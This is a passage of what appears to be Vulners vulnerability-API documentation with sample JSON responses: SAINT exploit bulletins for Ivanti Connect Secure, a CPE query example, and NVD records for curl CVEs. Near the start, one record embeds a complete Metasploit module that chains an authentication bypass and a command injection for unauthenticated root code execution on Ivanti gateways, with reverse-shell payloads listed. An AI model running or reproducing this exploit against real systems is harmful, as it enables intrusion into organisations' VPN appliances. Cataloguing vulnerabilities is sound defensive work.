            "sourceData": "`##  \n# This module requires Metasploit: https://metasploit.com/download  \n# Current source: https://github.com/rapid7/metasploit-framework  \n##  \n  \nclass MetasploitModule < Msf::Exploit::Remote  \nRank = ExcellentRanking  \n  \ninclude Msf::Exploit::Remote::HttpClient  \nprepend Msf::Exploit::Remote::AutoCheck  \n  \ndef initialize(info = {})  \nsuper(  \nupdate_info(  \ninfo,  \n'Name' => 'Ivanti Connect Secure Unauthenticated Remote Code Execution',  \n'Description' => %q{  \nThis module chains an authentication bypass vulnerability (CVE-2023-46805) and a command injection  \nvulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti  \nPolicy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and  \n22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are  \nalso vulnerable.  \n},  \n'License' => MSF_LICENSE,  \n'Author' => [  \n'sfewer-r7', # MSF Exploit & Rapid7 Analysis  \n],  \n'References' => [  \n['CVE', '2023-46805'], # The auth bypass vulnerability.  \n['CVE', '2024-21887'], # The command injection vulnerability.  \n['URL', 'https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis'],  \n['URL', 'https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887/']  \n],  \n'DisclosureDate' => '2024-01-10',  \n'Platform' => %w[linux unix],  \n'Arch' => [ARCH_CMD],  \n'Privileged' => true, # Code execution as root.  \n'Targets' => [  \n[  \n# Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:  \n# cmd/linux/http/x64/meterpreter/reverse_tcp  \n# cmd/linux/http/x64/shell/reverse_tcp  \n# cmd/linux/http/x86/shell/reverse_tcp  \n'Linux Command',  \n{  \n'Platform' => 'linux',  \n'Arch' => [ARCH_CMD]  \n},  \n],  \n[  \n# Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:  \n# cmd/unix/python/meterpreter/reverse_tcp  \n# cmd/unix/reverse_bash  \n# cmd/unix/reverse_python  \n'Unix Command',  \n{  \n'Platform' => 'unix',  \n'Arch' => [ARCH_CMD]  \n},  \n]  \n],  \n'DefaultOptions' => {  \n'RPORT' => 443,  \n'SSL' => true,  \n'FETCH_WRITABLE_DIR' => '/tmp'  \n},  \n'DefaultTarget' => 0,  \n'Notes' => {  \n'Stability' => [CRASH_SAFE],  \n'Reliability' => [REPEATABLE_SESSION],  \n'SideEffects' => [IOC_IN_LOGS]  \n}  \n)  \n)  \nend  \n  \ndef check  \n# We leverage the auth bypass to request the authenticated endpoint /api/v1/system/system-information and retrieve  \n# the target system version information. If this requests succeeds, the target is vulnerable.  \nres = send_request_cgi(  \n'method' => 'GET',  \n'uri' => '/api/v1/totp/user-backup-code/../../system/system-information'  \n)  \n  \nreturn CheckCode::Unknown('Connection failed') unless res  \n  \n# If the vendor mitigation has been applied, the request will return 403 Forbidden.  \nreturn CheckCode::Safe if res.code != 200  \n  \n# By here we know the target is vulnerable, we can pull out the exact version information from the expected JSON  \n# response, this is only for display purposes, we don't need to test the version information.  \n  \njson_data = res.get_json_document  \n  \nname = json_data.dig('software-inventory', 'software', 'name')  \n  \nversion = json_data.dig('software-inventory', 'software', 'version')  \n  \nbuild = json_data.dig('software-inventory', 'software', 'build')  \n  \n# Return CheckCode::Unknown if we got a JSON response but it didn't contain the expected keys, or if  \n# get_json_document could not parse the JSON (and will return an empty Hash).  \nreturn CheckCode::Unknown('No version information in response') if name.nil? || version.nil? || build.nil?  \n  \nExploit::CheckCode::Vulnerable(\"#{name} #{version} (#{build})\")  \nend  \n  \ndef exploit  \nsend_request_cgi(  \n'method' => 'POST',  \n'uri' => '/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection',  \n'ctype' => 'application/json',  \n'data' => {  \n'type' => \";#{payload.encoded} #\",  \n'txtGCPProject' => Rex::Text.rand_text_alpha(8),  \n'txtGCPSecret' => Rex::Text.rand_text_alpha(8),  \n'txtGCPPath' => Rex::Text.rand_text_alpha(8),  \n'txtGCPBucket' => Rex::Text.rand_text_alpha(8)  \n}.to_json  \n)  \nend  \nend  \n`\n",
            "ai_score": {
                "value": 7.4,
                "uncertanity": 1.9,
                "vector": "NONE"
            }
        },
        {
            "id": "SAINT:023354DDA8BBB4879D8A5440380C03C9",
            "type": "saint",
            "bulletinFamily": "exploit",
            "title": "Ivanti Connect Secure Server-Side Request Forgery",
            "description": "Added: 02/05/2024  \n\n\n### Background\n\n[Ivanti Connect Secure](<https://www.ivanti.com/products/connect-secure-vpn>) is a web-based remote access VPN. \n\n### Problem\n\nA server-side request forgery vulnerability in the SAML component allows attackers to access restricted resources without authentication. This can lead to remote command execution when chained with other vulnerabilities. \n\n### Resolution\n\nApply the appropriate patch referenced in the [Ivanti Security Advisory](<https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure>). \n\n### References\n\n<https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure>  \n\n\n### Platforms\n\nLinux  \n  \n\n",
            "published": "2024-02-05T00:00:00",
            "modified": "2024-02-05T00:00:00",
            "cvss": {
                "score": 6.5,
                "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"
            },
            "cvss2": {
                "cvssV2": {
                    "version": "2.0",
                    "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                    "accessVector": "NETWORK",
                    "accessComplexity": "LOW",
                    "authentication": "SINGLE",
                    "confidentialityImpact": "PARTIAL",
                    "integrityImpact": "PARTIAL",
                    "availabilityImpact": "PARTIAL",
                    "baseScore": 6.5
                },
                "severity": "MEDIUM",
                "exploitabilityScore": 8.0,
                "impactScore": 6.4,
                "acInsufInfo": false,
                "obtainAllPrivilege": false,
                "obtainUserPrivilege": false,
                "obtainOtherPrivilege": false,
                "userInteractionRequired": false
            },
            "cvss3": {
                "source": "[email protected]",
                "type": "Secondary",
                "exploitabilityScore": 2.8,
                "impactScore": 5.9,
                "cvssV3": {
                    "version": "3.0",
                    "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                    "attackVector": "NETWORK",
                    "attackComplexity": "LOW",
                    "privilegesRequired": "LOW",
                    "userInteraction": "NONE",
                    "scope": "UNCHANGED",
                    "confidentialityImpact": "HIGH",
                    "integrityImpact": "HIGH",
                    "availabilityImpact": "HIGH",
                    "baseScore": 8.8,
                    "baseSeverity": "HIGH"
                }
            },
            "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/ivanti_connect_secure_ssrf",
            "cvelist": [
                "CVE-2024-21888"
            ],
            "lastseen": "2024-02-12T13:22:09",
            "ai_score": {
                "value": 7.6,
                "uncertanity": 2.5,
                "vector": "NONE"
            }
        },
        {
            "id": "SAINT:60BDA75642503EC398357486212FA6C7",
            "type": "saint",
            "bulletinFamily": "exploit",
            "title": "Invanti Connect Secure and Policy Secure authentication bypass and command injection",
            "description": "Added: 01/18/2024  \n\n\n### Background\n\n[Ivanti Connect Secure](<https://www.ivanti.com/products/connect-secure-vpn>) is a web-based remote access VPN. \n\n### Problem\n\nAn authentication bypass vulnerability and a command injection vulnerability when exploited together could allow a remote unauthenticated attacker to execute arbitrary commands. \n\n### Resolution\n\nApply the appropriate patch for your Ivanti product when available, or import the `mitigation.release.20240107.1.xml` file as a workaround. See the [Invanti knowledgebase article](<https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways>) for more information. \n\n### References\n\n<https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways>  \n  \n\n",
            "published": "2024-01-18T00:00:00",
            "modified": "2024-01-18T00:00:00",
            "cvss": {
                "score": 6.4,
                "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
            },
            "cvss2": {
                "cvssV2": {
                    "version": "2.0",
                    "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
                    "accessVector": "NETWORK",
                    "accessComplexity": "LOW",
                    "authentication": "NONE",
                    "confidentialityImpact": "PARTIAL",
                    "integrityImpact": "PARTIAL",
                    "availabilityImpact": "NONE",
                    "baseScore": 6.4
                },
                "severity": "MEDIUM",
                "exploitabilityScore": 10.0,
                "impactScore": 4.9,
                "acInsufInfo": false,
                "obtainAllPrivilege": false,
                "obtainUserPrivilege": false,
                "obtainOtherPrivilege": false,
                "userInteractionRequired": false
            },
            "cvss3": {
                "source": "[email protected]",
                "type": "Secondary",
                "exploitabilityScore": 2.3,
                "impactScore": 6.0,
                "cvssV3": {
                    "version": "3.0",
                    "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
                    "attackVector": "NETWORK",
                    "attackComplexity": "LOW",
                    "privilegesRequired": "HIGH",
                    "userInteraction": "NONE",
                    "scope": "CHANGED",
                    "confidentialityImpact": "HIGH",
                    "integrityImpact": "HIGH",
                    "availabilityImpact": "HIGH",
                    "baseScore": 9.1,
                    "baseSeverity": "CRITICAL"
                }
            },
            "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/ivanti_connect_secure_cmd_inj",
            "cvelist": [
                "CVE-2023-46805",
                "CVE-2024-21887"
            ],
            "lastseen": "2024-02-12T13:22:01",
            "ai_score": {
                "value": 8.6,
                "uncertanity": 2.4,
                "vector": "NONE"
            }
        },
        {
            "id": "SAINT:CBB2F1CA8B177BA96AECA3D1FB0C7611",
            "type": "saint",
            "bulletinFamily": "exploit",
            "title": "Invanti Connect Secure and Policy Secure authentication bypass and command injection",
            "description": "Added: 01/18/2024  \n\n\n### Background\n\n[Ivanti Connect Secure](<https://www.ivanti.com/products/connect-secure-vpn>) is a web-based remote access VPN. \n\n### Problem\n\nAn authentication bypass vulnerability and a command injection vulnerability when exploited together could allow a remote unauthenticated attacker to execute arbitrary commands. \n\n### Resolution\n\nApply the appropriate patch for your Ivanti product when available, or import the `mitigation.release.20240107.1.xml` file as a workaround. See the [Invanti knowledgebase article](<https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways>) for more information. \n\n### References\n\n<https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways>  \n  \n\n",
            "published": "2024-01-18T00:00:00",
            "modified": "2024-01-18T00:00:00",
            "cvss": {
                "score": 6.4,
                "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
            },
            "cvss2": {
                "cvssV2": {
                    "version": "2.0",
                    "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
                    "accessVector": "NETWORK",
                    "accessComplexity": "LOW",
                    "authentication": "NONE",
                    "confidentialityImpact": "PARTIAL",
                    "integrityImpact": "PARTIAL",
                    "availabilityImpact": "NONE",
                    "baseScore": 6.4
                },
                "severity": "MEDIUM",
                "exploitabilityScore": 10.0,
                "impactScore": 4.9,
                "acInsufInfo": false,
                "obtainAllPrivilege": false,
                "obtainUserPrivilege": false,
                "obtainOtherPrivilege": false,
                "userInteractionRequired": false
            },
            "cvss3": {
                "source": "[email protected]",
                "type": "Secondary",
                "exploitabilityScore": 2.3,
                "impactScore": 6.0,
                "cvssV3": {
                    "version": "3.0",
                    "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
                    "attackVector": "NETWORK",
                    "attackComplexity": "LOW",
                    "privilegesRequired": "HIGH",
                    "userInteraction": "NONE",
                    "scope": "CHANGED",
                    "confidentialityImpact": "HIGH",
                    "integrityImpact": "HIGH",
                    "availabilityImpact": "HIGH",
                    "baseScore": 9.1,
                    "baseSeverity": "CRITICAL"
                }
            },
            "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ivanti_connect_secure_cmd_inj",
            "cvelist": [
                "CVE-2023-46805",
                "CVE-2024-21887"
            ],
            "lastseen": "2024-02-04T12:52:55",
            "ai_score": {
                "value": 8.7,
                "uncertanity": 2.4,
                "vector": "NONE"
            }
        }
    ]
]

Vulnerabilities by CPE product

To obtain all vulnerabilities, specify the CPE product and version as a string:

Required parameters:

  • software (str): Common Platform Enumeration (CPE) identifier for the software. For example, "cpe:/a:cybozu:garoon:4.2.1".
  • apiKey: Activated API key to authenticate the request.

Optional parameters:

  • version: software version. Also, can be mention in software field.
  • respect_major_version (str): If true, limits results to the specified major version. Default is false.
  • exclude_any_version (str): If true, excludes extended versions and returns only the exact match. Default is false.
  • only_ids (bool): If true, returns only the IDs of the vulnerabilities. Default is false.

Query:

POST /api/v3/burp/softwareapi/

Query example for CPE identifier:

curl -XPOST https://vulners.com/api/v3/burp/softwareapi/ -H  'Content-Type: application/json' -d '{
    "software": "cpe:2.3:a:haxx:curl:7.85.0", 
    "type": "cpe", 
    "maxVulnerabilities": 50, 
    "respect_major_version": "true",
    "exclude_any_version": "false",
    "only_ids": false,
    "apiKey": "{API key}"
}'

cpe_results = vulners_api.get_cpe_vulnerabilities(
    cpe="cpe:2.3:a:haxx:curl:7.85.0",
    respect_major_version='true',
    exclude_any_version='false',
    only_ids='false'
)
cpe_exploit_list = cpe_results.get('exploit')
cpe_vulnerabilities_list = [cpe_results.get(key) for key in cpe_results if key not in ['info', 'blog', 'bugbounty']]
[
    [
        {
            "id": "CVE-2022-35260",
            "type": "cve",
            "bulletinFamily": "cve",
            "title": "CVE-2022-35260",
            "description": "curl can be told to parse a `.netrc` file for credentials. If that file endsin a line with 4095 consecutive non-white space letters and no newline, curlwould first read past the end of the stack-based buffer, and if the readworks, write a zero byte beyond its boundary.This will in most cases cause a segfault or similar, but circumstances might also cause different outcomes.If a malicious user can provide a custom netrc file to an application or otherwise affect its contents, this flaw could be used as denial-of-service.",
            "published": "2022-12-05T22:15:10",
            "modified": "2024-03-27T15:00:15",
            "cvss": {
                "score": 6.5,
                "severity": "MEDIUM",
                "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
                "version": "3.1"
            },
            "cvss2": {},
            "cvss3": {
                "cvssV3": {
                    "version": "3.1",
                    "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
                    "baseScore": 6.5,
                    "baseSeverity": "MEDIUM",
                    "attackVector": "NETWORK",
                    "attackComplexity": "LOW",
                    "privilegesRequired": "NONE",
                    "userInteraction": "REQUIRED",
                    "scope": "UNCHANGED",
                    "confidentialityImpact": "NONE",
                    "integrityImpact": "NONE",
                    "availabilityImpact": "HIGH"
                }
            },
            "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-35260",
            "cvelist": [
                "CVE-2022-35260"
            ],
            "lastseen": "2024-06-14T10:20:54",
            "cpe": [],
            "cpe23": [],
            "cwe": [
                "CWE-787",
                "CWE-125"
            ],
            "affectedSoftware": [
                {
                    "cpeName": "haxx:curl",
                    "version": "7.86.0",
                    "operator": "lt",
                    "name": "haxx curl"
                }
            ],
            "ai_score": {
                "value": 7.5,
                "uncertanity": 0.9,
                "vector": "NONE"
            }
        },
        {
            "id": "CVE-2022-42915",
            "type": "cve",
            "bulletinFamily": "cve",
            "title": "CVE-2022-42915",
            "description": "curl before 7.86.0 has a double free. If curl is told to use an HTTP proxy for a transfer with a non-HTTP(S) URL, it sets up the connection to the remote server by issuing a CONNECT request to the proxy, and then tunnels the rest of the protocol through. An HTTP proxy might refuse this request (HTTP proxies often only allow outgoing connections to specific port numbers, like 443 for HTTPS) and instead return a non-200 status code to the client. Due to flaws in the error/cleanup handling, this could trigger a double free in curl if one of the following schemes were used in the URL for the transfer: dict, gopher, gophers, ldap, ldaps, rtmp, rtmps, or telnet. The earliest affected version is 7.77.0.",
            "published": "2022-10-29T20:15:09",
            "modified": "2024-03-27T14:59:29",
            "cvss": {
                "score": 8.1,
                "severity": "HIGH",
                "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
            },
            "cvss2": {},
            "cvss3": {
                "cvssV3": {
                    "version": "3.1",
                    "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
                    "baseScore": 8.1,
                    "baseSeverity": "HIGH",
                    "attackVector": "NETWORK",
                    "attackComplexity": "HIGH",
                    "privilegesRequired": "NONE",
                    "userInteraction": "NONE",
                    "scope": "UNCHANGED",
                    "confidentialityImpact": "HIGH",
                    "integrityImpact": "HIGH",
                    "availabilityImpact": "HIGH"
                }
            },
            "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-42915",
            "cvelist": [
                "CVE-2022-42915"
            ],
            "lastseen": "2024-06-14T10:26:15",
            "cpe": [],
            "cpe23": [],
            "cwe": [
                "CWE-415"
            ],
            "affectedSoftware": [
                {
                    "cpeName": "haxx:curl",
                    "version": "7.86.0",
                    "operator": "lt",
                    "name": "haxx curl"
                }
            ],
            "ai_score": {
                "value": 8.9,
                "uncertanity": 0.4,
                "vector": "NONE"
            }
        },
        {
            "id": "CVE-2022-42916",
            "type": "cve",
            "bulletinFamily": "cve",
            "title": "CVE-2022-42916",
            "description": "In curl before 7.86.0, the HSTS check could be bypassed to trick it into staying with HTTP. Using its HSTS support, curl can be instructed to use HTTPS directly (instead of using an insecure cleartext HTTP step) even when HTTP is provided in the URL. This mechanism could be bypassed if the host name in the given URL uses IDN characters that get replaced with ASCII counterparts as part of the IDN conversion, e.g., using the character UTF-8 U+3002 (IDEOGRAPHIC FULL STOP) instead of the common ASCII full stop of U+002E (.). The earliest affected version is 7.77.0 2021-05-26.",
            "published": "2022-10-29T02:15:09",
            "modified": "2024-03-27T14:59:02",
            "cvss": {
                "score": 7.5,
                "severity": "HIGH",
                "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
            },
            "cvss2": {},
            "cvss3": {
                "cvssV3": {
                    "version": "3.1",
                    "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                    "baseScore": 7.5,
                    "baseSeverity": "HIGH",
                    "attackVector": "NETWORK",
                    "attackComplexity": "LOW",
                    "privilegesRequired": "NONE",
                    "userInteraction": "NONE",
                    "scope": "UNCHANGED",
                    "confidentialityImpact": "HIGH",
                    "integrityImpact": "NONE",
                    "availabilityImpact": "NONE"
                }
            },
            "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-42916",
            "cvelist": [
                "CVE-2022-42916"
            ],
            "lastseen": "2024-06-14T10:09:50",
            "cpe": [],
            "cpe23": [],
            "cwe": [
                "CWE-319"
            ],
            "affectedSoftware": [
                {
                    "cpeName": "haxx:curl",
                    "version": "7.86.0",
                    "operator": "lt",
                    "name": "haxx curl"
                }
            ],
            "ai_score": {
                "value": 8.3,
                "uncertanity": 0.5,
                "vector": "NONE"
            }
        },
        {
            "id": "CVE-2022-43551",
            "type": "cve",
            "bulletinFamily": "cve",
            "title": "CVE-2022-43551",
            "description": "A vulnerability exists in curl <7.87.0 HSTS check that could be bypassed to trick it to keep using HTTP. Using its HSTS support, curl can be instructed to use HTTPS instead of using an insecure clear-text HTTP step even when HTTP is provided in the URL. However, the HSTS mechanism could be bypassed if the host name in the given URL first uses IDN characters that get replaced to ASCII counterparts as part of the IDN conversion. Like using the character UTF-8 U+3002 (IDEOGRAPHIC FULL STOP) instead of the common ASCII full stop (U+002E) `.`. Then in a subsequent request, it does not detect the HSTS state and makes a clear text transfer. Because it would store the info IDN encoded but look for it IDN decoded.",
            "published": "2022-12-23T15:15:15",
            "modified": "2024-03-27T14:58:37",
            "cvss": {
                "score": 7.5,
                "severity": "HIGH",
                "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
            },
            "cvss2": {},
            "cvss3": {
                "cvssV3": {
                    "version": "3.1",
                    "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                    "baseScore": 7.5,
                    "baseSeverity": "HIGH",
                    "attackVector": "NETWORK",
                    "attackComplexity": "LOW",
                    "privilegesRequired": "NONE",
                    "userInteraction": "NONE",
                    "scope": "UNCHANGED",
                    "confidentialityImpact": "HIGH",
                    "integrityImpact": "NONE",
                    "availabilityImpact": "NONE"
                }
            },
            "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-43551",
            "cvelist": [
                "CVE-2022-43551"
            ],
            "lastseen": "2024-06-14T11:21:09",
            "cpe": [],
            "cpe23": [],
            "cwe": [
                "CWE-319"
            ],
            "affectedSoftware": [
                {
                    "cpeName": "haxx:curl",
                    "version": "7.87.0",
                    "operator": "lt",
                    "name": "haxx curl"
                }
            ],
            "ai_score": {
                "value": 7.3,
                "uncertanity": 0.2,
                "vector": "NONE"
            }
        },
        {
            "id": "CVE-2023-23914",
            "type": "cve",
            "bulletinFamily": "cve",
            "title": "CVE-2023-23914",
            "description": "A cleartext transmission of sensitive information vulnerability exists in curl <v7.88.0 that could cause HSTS functionality fail when multiple URLs are requested serially. Using its HSTS support, curl can be instructed to use HTTPS instead of usingan insecure clear-text HTTP step even when HTTP is provided in the URL. ThisHSTS mechanism would however surprisingly be ignored by subsequent transferswhen done on the same command line because the state would not be properlycarried on.",
            "published": "2023-02-23T20:15:13",
            "modified": "2024-03-27T14:55:05",
            "cvss": {
                "score": 9.1,
                "severity": "CRITICAL",
                "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
                "version": "3.1"
            },
            "cvss2": {},
            "cvss3": {
                "cvssV3": {
                    "version": "3.1",
                    "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
                    "baseScore": 9.1,
                    "baseSeverity": "CRITICAL",
                    "attackVector": "NETWORK",
                    "attackComplexity": "LOW",
                    "privilegesRequired": "NONE",
                    "userInteraction": "NONE",
                    "scope": "UNCHANGED",
                    "confidentialityImpact": "HIGH",
                    "integrityImpact": "HIGH",
                    "availabilityImpact": "NONE"
                }
            },
            "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-23914",
            "cvelist": [
                "CVE-2023-23914"
            ],
            "lastseen": "2024-06-14T10:13:37",
            "cpe": [],
            "cpe23": [],
            "cwe": [
                "CWE-319"
            ],
            "affectedSoftware": [
                {
                    "cpeName": "haxx:curl",
                    "version": "7.88.0",
                    "operator": "lt",
                    "name": "haxx curl"
                }
            ],
            "ai_score": {
                "value": 8.8,
                "uncertanity": 0.3,
                "vector": "NONE"
            }
        },
        {
            "id": "CVE-2023-23915",
            "type": "cve",
            "bulletinFamily": "cve",
            "title": "CVE-2023-23915",
            "description": "A cleartext transmission of sensitive information vulnerability exists in curl <v7.88.0 that could cause HSTS functionality to behave incorrectly when multiple URLs are requested in parallel. Using its HSTS support, curl can be instructed to use HTTPS instead of using an insecure clear-text HTTP step even when HTTP is provided in the URL. This HSTS mechanism would however surprisingly fail when multiple transfers are done in parallel as the HSTS cache file gets overwritten by the most recentlycompleted transfer. A later HTTP-only transfer to the earlier host name would then *not* get upgraded properly to HSTS.",
            "published": "2023-02-23T20:15:13",
            "modified": "2024-03-27T14:55:01",
            "cvss": {
                "score": 6.5,
                "severity": "MEDIUM",
                "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
                "version": "3.1"
            },
            "cvss2": {},
            "cvss3": {
                "cvssV3": {
                    "version": "3.1",
                    "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
                    "baseScore": 6.5,
                    "baseSeverity": "MEDIUM",
                    "attackVector": "NETWORK",
                    "attackComplexity": "LOW",
                    "privilegesRequired": "NONE",
                    "userInteraction": "NONE",
                    "scope": "UNCHANGED",
                    "confidentialityImpact": "LOW",
                    "integrityImpact": "LOW",
                    "availabilityImpact": "NONE"
                }
            },
            "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-23915",
            "cvelist": [
                "CVE-2023-23915"
            ],
            "lastseen": "2024-06-14T10:17:42",
            "cpe": [],
            "cpe23": [],
            "cwe": [
                "CWE-319"
            ],
            "affectedSoftware": [
                {
                    "cpeName": "haxx:curl",
                    "version": "7.88.0",
                    "operator": "lt",
                    "name": "haxx curl"
                }
            ],
            "ai_score": {
                "value": 6.2,
                "uncertanity": 0.3,
                "vector": "NONE"
            }
        },
        {
            "id": "CVE-2023-23916",
            "type": "cve",
            "bulletinFamily": "cve",
            "title": "CVE-2023-23916",
            "description": "An allocation of resources without limits or throttling vulnerability exists in curl <v7.88.0 based on the \"chained\" HTTP compression algorithms, meaning that a server response can be compressed multiple times and potentially with differentalgorithms. The number of acceptable \"links\" in this \"decompression chain\" wascapped, but the cap was implemented on a per-header basis allowing a maliciousserver to insert a virtually unlimited number of compression steps simply byusing many headers. The use of such a decompression chain could result in a \"malloc bomb\", making curl end up spending enormous amounts of allocated heap memory, or trying to and returning out of memory errors.",
            "published": "2023-02-23T20:15:13",
            "modified": "2024-03-27T14:54:58",
            "cvss": {
                "score": 6.5,
                "severity": "MEDIUM",
                "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
                "version": "3.1"
            },
            "cvss2": {},
            "cvss3": {
                "cvssV3": {
                    "version": "3.1",
                    "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
                    "baseScore": 6.5,
                    "baseSeverity": "MEDIUM",
                    "attackVector": "NETWORK",
                    "attackComplexity": "LOW",
                    "privilegesRequired": "NONE",
                    "userInteraction": "REQUIRED",
                    "scope": "UNCHANGED",
                    "confidentialityImpact": "NONE",
                    "integrityImpact": "NONE",
                    "availabilityImpact": "HIGH"
                }
            },
            "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-23916",
            "cvelist": [
                "CVE-2023-23916"
            ],
            "lastseen": "2024-06-14T11:47:37",
            "cpe": [],
            "cpe23": [],
            "cwe": [
                "CWE-770"
            ],
            "affectedSoftware": [
                {
                    "cpeName": "haxx:curl",
                    "version": "7.88.0",
                    "operator": "lt",
                    "name": "haxx curl"
                }
            ],
            "ai_score": {
                "value": 6.7,
                "uncertanity": 0.3,
                "vector": "NONE"
            }
        },
        {
            "id": "CVE-2023-27533",
            "type": "cve",
            "bulletinFamily": "cve",
            "title": "CVE-2023-27533",
            "description": "A vulnerability in input validation exists in curl <8.0 during communication using the TELNET protocol may allow an attacker to pass on maliciously crafted user name and \"telnet options\" during server negotiation. The lack of proper input scrubbing allows an attacker to send content or perform option negotiation without the application's intent. This vulnerability could be exploited if an application allows user input, thereby enabling attackers to execute arbitrary code on the system.",
            "published": "2023-03-30T20:15:07",
            "modified": "2024-03-27T14:54:51",
            "cvss": {
                "score": 8.8,
                "severity": "HIGH",
                "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
                "version": "3.1"
            },
            "cvss2": {},
            "cvss3": {
                "cvssV3": {
                    "version": "3.1",
                    "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
                    "baseScore": 8.8,
                    "baseSeverity": "HIGH",
                    "attackVector": "NETWORK",
                    "attackComplexity": "LOW",
                    "privilegesRequired": "NONE",
                    "userInteraction": "REQUIRED",
                    "scope": "UNCHANGED",
                    "confidentialityImpact": "HIGH",
                    "integrityImpact": "HIGH",
                    "availabilityImpact": "HIGH"
                }
            },
            "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-27533",
            "cvelist": [
                "CVE-2023-27533"
            ],
            "lastseen": "2024-06-14T10:24:24",
            "cpe": [
                "cpe:/a:haxx:curl::::"
            ],
            "cpe23": [
                "cpe:2.3:a:haxx:curl:*:*:*:*:*:*:*:*"
            ],
            "cwe": [
                "CWE-74",
                "CWE-75"
            ],
            "affectedSoftware": [
                {
                    "cpeName": "haxx:curl",
                    "version": "7.881",
                    "operator": "le",
                    "name": "haxx curl"
                }
            ],
            "ai_score": {
                "value": 8.8,
                "uncertanity": 0.1,
                "vector": "NONE"
            }
        },
        {
            "id": "CVE-2023-27534",
            "type": "cve",
            "bulletinFamily": "cve",
            "title": "CVE-2023-27534",
            "description": "A path traversal vulnerability exists in curl <8.0.0 SFTP implementation causes the tilde (~) character to be wrongly replaced when used as a prefix in the first path element, in addition to its intended use as the first element to indicate a path relative to the user's home directory. Attackers can exploit this flaw to bypass filtering or execute arbitrary code by crafting a path like /~2/foo while accessing a server with a specific user.",
            "published": "2023-03-30T20:15:07",
            "modified": "2024-03-27T14:54:34",
            "cvss": {
                "score": 8.8,
                "severity": "HIGH",
                "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
            },
            "cvss2": {},
            "cvss3": {
                "cvssV3": {
                    "version": "3.1",
                    "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                    "baseScore": 8.8,
                    "baseSeverity": "HIGH",
                    "attackVector": "NETWORK",
                    "attackComplexity": "LOW",
                    "privilegesRequired": "LOW",
                    "userInteraction": "NONE",
